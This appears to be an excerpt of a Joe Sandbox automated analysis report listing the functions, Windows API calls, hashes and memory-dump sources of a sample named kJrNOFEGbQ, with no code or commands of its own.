Opcode Fuzzy Hash: ba6b89382cce1a9ecacd00a92e91135d67e0a0797bece91ee3bc4fcf4f330465
Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832

Function 0037E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E51F

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

PDu<7, xrefs: 0037E519

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<7
API String ID: 1269201914-3110419215
Opcode ID: 31bd0146457bcfd31a0a57d00152b07e708580c7f57fa8e2dadbebc4ac1d62d1
Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
Opcode Fuzzy Hash: 31bd0146457bcfd31a0a57d00152b07e708580c7f57fa8e2dadbebc4ac1d62d1
Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832

Function 0037E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E580

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

Fjun7, xrefs: 0037E57A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun7
API String ID: 1269201914-1894352427
Opcode ID: 8ddbde0bbbf159f4e708b9d72b78f3cd680ce0283e87b57012b0ebcd4a49d2e9
Instruction ID: 17738dec1d8511a9d8ee601dee3d3e967d3bd27756e27c93edd811a0480f4300
Opcode Fuzzy Hash: 8ddbde0bbbf159f4e708b9d72b78f3cd680ce0283e87b57012b0ebcd4a49d2e9
Instruction Fuzzy Hash: 67A012C11680017C311611501C02C37011CC0C9F20330D45DF42988480684408001431

Function 0037E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E580

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

Fjun7, xrefs: 0037E57A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun7
API String ID: 1269201914-1894352427
Opcode ID: 62f364bf0b023927d1ae5047a87069ca68658f4473eb86fd85468a9b086f23f6
Instruction ID: 17738dec1d8511a9d8ee601dee3d3e967d3bd27756e27c93edd811a0480f4300
Opcode Fuzzy Hash: 62f364bf0b023927d1ae5047a87069ca68658f4473eb86fd85468a9b086f23f6
Instruction Fuzzy Hash: 67A012C11680017C311611501C02C37011CC0C9F20330D45DF42988480684408001431

Function 0038BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0038B7BB: GetOEMCP.KERNEL32(00000000,?,?,0038BA44,?), ref: 0038B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0038BA89,?,00000000), ref: 0038BC64
GetCPInfo.KERNEL32(00000000,0038BA89,?,?,?,0038BA89,?,00000000), ref: 0038BC77

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 8e0bb639b9e058106b10f0878966c39f11c822bf941f0b50b7232e7e92b96a0a
Instruction ID: 0a002bfd3d4ea2d7291f3ba06b4c941558e675aac1319710d703a1a22425d965
Opcode Fuzzy Hash: 8e0bb639b9e058106b10f0878966c39f11c822bf941f0b50b7232e7e92b96a0a
Instruction Fuzzy Hash: DE51F670900347AFDB22EF75C4916BAFBF9EF41300F1844EED4968B261D735954A8B90

Function 00369A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00369A50,?,?,00000000,?,?,00368CBC,?), ref: 00369BAB
GetLastError.KERNEL32(?,00000000,00368411,-00009570,00000000,000007F3), ref: 00369BB6

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7c52843619c392dfdf2a0973dadc4ab7814f35fe63a71ebc9e93795fb748f1b9
Instruction ID: 126a071177915debd15028941008d1556bac5878d3174289fe4601eb27c7aeb8
Opcode Fuzzy Hash: 7c52843619c392dfdf2a0973dadc4ab7814f35fe63a71ebc9e93795fb748f1b9
Instruction Fuzzy Hash: A341CE70604301CFDB26DF19E58466AB7EDFFD5320F16CA2FE88287268D770AD458A51

Function 00361E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00361E55

Part of subcall function 00363BBA: __EH_prolog.LIBCMT ref: 00363BBF

_wcslen.LIBCMT ref: 00361EFD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 7b6456f9416e6fb0391ad042b7cb150f396ba648648a98fff51d0a7d73e1fd49
Instruction ID: 9d43d336f39d0efe37224e7290a5335d82f145f45a6f0ad566b9dbd4ad79defc
Opcode Fuzzy Hash: 7b6456f9416e6fb0391ad042b7cb150f396ba648648a98fff51d0a7d73e1fd49
Instruction Fuzzy Hash: C1313C72904209AFCF16DF99C945AEEFBF5AF48300F1480A9F445AB255CB769E10CB60

Function 00369DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003673BC,?,?,?,00000000), ref: 00369DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00369E70

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 6833062aaa42011597bb5d25998007acab733dcce4b6ffa096db9037c936dbf2
Instruction ID: 50439e6014e83e71acc1d5924708aa5ce6a2c666660cc147270f76b3965991d7
Opcode Fuzzy Hash: 6833062aaa42011597bb5d25998007acab733dcce4b6ffa096db9037c936dbf2
Instruction Fuzzy Hash: C721EE32248286EBC716CF34C891BABBBECAF55704F09882EF4C587145D339E90D9B61

Function 0036966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00369F27,?,?,0036771A), ref: 003696E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00369F27,?,?,0036771A), ref: 00369716

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 34a4e5e4469007fb07b93f9e6cb4d24dcd67505fa0f8378cdc2bc7c9e07a5191
Instruction ID: e1ab8092a249de20605acb152e591d4e1210c9e83d6567dbe7e9b766a91541b6
Opcode Fuzzy Hash: 34a4e5e4469007fb07b93f9e6cb4d24dcd67505fa0f8378cdc2bc7c9e07a5191
Instruction Fuzzy Hash: 1321F1B1004344AFE3318A64CC89FB7B7DCEB49330F018A1AF9D6C65D9C378A8848631

Function 00369E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00369EC7
GetLastError.KERNEL32 ref: 00369ED4

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 6e0d849302269b809566dcd92cc860d7450bc9835fbae1c07c42aa3fc6af73a6
Instruction ID: df34ecde0fdec894e8efa185474b89f9bebc30df9a23f06754ce867b50581efa
Opcode Fuzzy Hash: 6e0d849302269b809566dcd92cc860d7450bc9835fbae1c07c42aa3fc6af73a6
Instruction Fuzzy Hash: 1911E530600700ABD726C628C841BA6B7ECAB45370F518A2BE153D2AD8D7B2ED45C760

Function 00388E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00388E75

Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0038CA2C,00000000,?,00386CBE,?,00000008,?,003891E0,?,?,?), ref: 00388E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,003A1098,003617CE,?,?,00000007,?,?,?,003613D6,?,00000000), ref: 00388EB1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 8d9621c950110d9e95b91ec1ac85bb3bd15cd1d805cf6d64715c191dd6e8d77d
Instruction ID: db6892e9ec948ed41a0326fafa89314906803a39df8e25cd371d3f0ff7fd8f26
Opcode Fuzzy Hash: 8d9621c950110d9e95b91ec1ac85bb3bd15cd1d805cf6d64715c191dd6e8d77d
Instruction Fuzzy Hash: 95F0C23220530666CB237B25AC05B6F376C8F81B70FA605A6F854AA191DF60FD0183A0

Function 0037109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 003710AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 003710B2

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 11740574bbdd6c68b4c6b0ad138c097f029f7ff2b7bd526f65affe1f93649cd6
Instruction ID: 54fa056a10ed014a24d07a9296ec7477e1819e381f1bf1130151a0e63c09b299
Opcode Fuzzy Hash: 11740574bbdd6c68b4c6b0ad138c097f029f7ff2b7bd526f65affe1f93649cd6
Instruction Fuzzy Hash: D1E0D873B10145ABCF2B8BB89C058EB73DDEA44304711C176E407E3201F938DE414A60

Function 0036A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501

Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 7cecca90e9b691cf6fc8e46ad234b5c5559c0f2733eb64bedb8eb3eae4db9a19
Instruction ID: d5e09dad74827950b216c6d2e9bf3bccdfca6a3d37ec770925d798e2c15d8c76
Opcode Fuzzy Hash: 7cecca90e9b691cf6fc8e46ad234b5c5559c0f2733eb64bedb8eb3eae4db9a19
Instruction Fuzzy Hash: 9EF030712401097BDF135F61DC45FDA37ACAF04385F448051B94AE6164EB71DED4DE50

Function 0036A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641,000000FF), ref: 0036A1F1

Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641), ref: 0036A21F

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 2fe3c5508ba04ddcc95f5b6088597c36bbac2c2dbb95239a0df24bfad915a190
Instruction ID: fac5d4660ef89e7df104a4095e38f43b4169d07214e9aeb011f0e2c9b230aedd
Opcode Fuzzy Hash: 2fe3c5508ba04ddcc95f5b6088597c36bbac2c2dbb95239a0df24bfad915a190
Instruction Fuzzy Hash: 2CE0D8751442096BEB135F60DC46FD9375CAF0C3C5F488061B945E6154EB72DEC4DE54

Function 0037AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00392641,000000FF), ref: 0037ACB0
CoUninitialize.COMBASE(?,?,?,?,00392641,000000FF), ref: 0037ACB5

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: bc54b56a65aef8494da8c956cd9fface9105ad9632f5fa74b19ba6cf7399c84b
Instruction ID: aaf3d130665de9b4ee1eb02249789242728b87c8df72d9ccb7966cd747131214
Opcode Fuzzy Hash: bc54b56a65aef8494da8c956cd9fface9105ad9632f5fa74b19ba6cf7399c84b
Instruction Fuzzy Hash: 87E06572504650EFCB129B5DDC06B45FBACFB4DB20F044266F416D3760CB747800CA90

Function 0036A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0036A23A,?,0036755C,?,?,?,?), ref: 0036A254

Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0036A23A,?,0036755C,?,?,?,?), ref: 0036A280

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: fc0414aa155cf0d9e13d1b699927ea646ce2723ae54ea937e6b740c4eef2646b
Instruction ID: 05c072e5270a6f92ef7167b9af5240e5b6eeb23deb3e9d05c083ca8145ae3ec2
Opcode Fuzzy Hash: fc0414aa155cf0d9e13d1b699927ea646ce2723ae54ea937e6b740c4eef2646b
Instruction Fuzzy Hash: EEE092755001245BCB22AB64CC05BD9B75CAB083E1F048661FD55E7294D771DE84CAA0

Function 0037DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0037DEEC

Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5

SetDlgItemTextW.USER32(00000065,?), ref: 0037DF03

Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
Part of subcall function 0037B568: IsDialogMessageW.USER32(00010474,?), ref: 0037B59E
Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
